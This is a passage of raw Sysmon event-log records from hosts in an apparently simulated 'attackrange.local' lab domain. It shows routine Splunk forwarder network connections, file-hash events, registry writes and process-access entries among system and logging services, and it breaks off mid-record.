(0x01d7b8f4-0x5acc76e2) 13241300x8000000000000000103285Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:49:26.559{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x8000000000000000103284Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:49:26.559{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 354300x800000000000000081133Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:24.741{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50009-false10.0.1.12-8000- 23542300x8000000000000000103291Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:27.950{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=100E15E242467E373C359298A74D196A,SHA256=F21E330DDD68886247B51E22E81247FB29FDD28FC2DF96FBBE50EF00D979D7A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081135Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:27.880{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCF82F0DFCBC295DC46B667132BD254,SHA256=D55D65106599482B568040B5C7A6331C99473C28C748417C7D63DB949BA40223,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103292Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:28.966{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=527B468DBCD6A619064FA810BA26A264,SHA256=39761573BFF9769EA72DA6E52731979C44DADB750675ABC1CD03A7357A90AD72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081136Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:28.880{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0100DAD140A237D141540161A281EF99,SHA256=97671F7547D65713139F49B68A17DB0DBE4B8373810105E80E9A93FF5084DABE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103294Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:29.981{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=397563404E3C64D72E050C67078BED92,SHA256=A25CF8E4B26FCBE374AF9E94FE4EB87E1C3D626813EF5F84DAE77EC94E181725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081138Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:29.895{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA9125757854F3E6C6D42CAC0A9B8B18,SHA256=B68BDC7169BA665306B3BB7B1214085D8EDCD183CA1C104B643677EB248BE6B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103293Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:27.357{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49509-false10.0.1.12-8000- 23542300x800000000000000081137Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:29.614{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081139Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:30.927{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B59B88DD6E8D3CC88B88A7F3C589AB26,SHA256=984F5A381765FCC98D30A55961B16EA92DB3A41DD98A20C71230BCB1E4F4FEFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081154Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:29.151{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50010-false10.0.1.12-8089- 23542300x800000000000000081153Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.927{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A50332E637436E10E503CDAD2DC8751,SHA256=BBFEA9E8102CCAC372AE9174C9A47AE3DE53E6BA294449A5464DABFD069A6A12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103295Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:31.028{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14121481C8969D8696AB611A2BA6C7EE,SHA256=BBBC95152B529089EA821A8BBB6513222EA4D39BCE4D63963BFE1EB5F1A364DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081152Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B20B-615A-3B01-00000000FD01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081151Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081150Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081149Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081148Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081147Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081146Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081145Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081144Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081143Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081142Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B20B-615A-3B01-00000000FD01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081141Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.489{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B20B-615A-3B01-00000000FD01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081140Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:31.490{2FDD8D40-B20B-615A-3B01-00000000FD01}2820C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103297Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:49:32.044{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2F24A37F21A47BEF1E1FF8A6AA0DF13,SHA256=DBB6241E0AC72157B19088A6CBF7CFAE69F508536377D8C332DB5BCC48D6D32A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081170Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.505{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=502C60261F8DEC03A03A184966B2F301,SHA256=ADDA9C7E8EB96B11CC875872E067EF1868684EDD457142A0F753210D1DE95556,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081169Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.505{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18500C57143A85FFCA3C38740E68EDC4,SHA256=B990F168DAE0C78FCF2E8138BD021323899C815A5D61BF62D7328A88FB9B38AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081168Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.302{2FDD8D40-B20C-615A-3C01-00000000FD01}1956972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081167Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B20C-615A-3C01-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081166Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081165Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081164Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:49:32.161{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081163Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 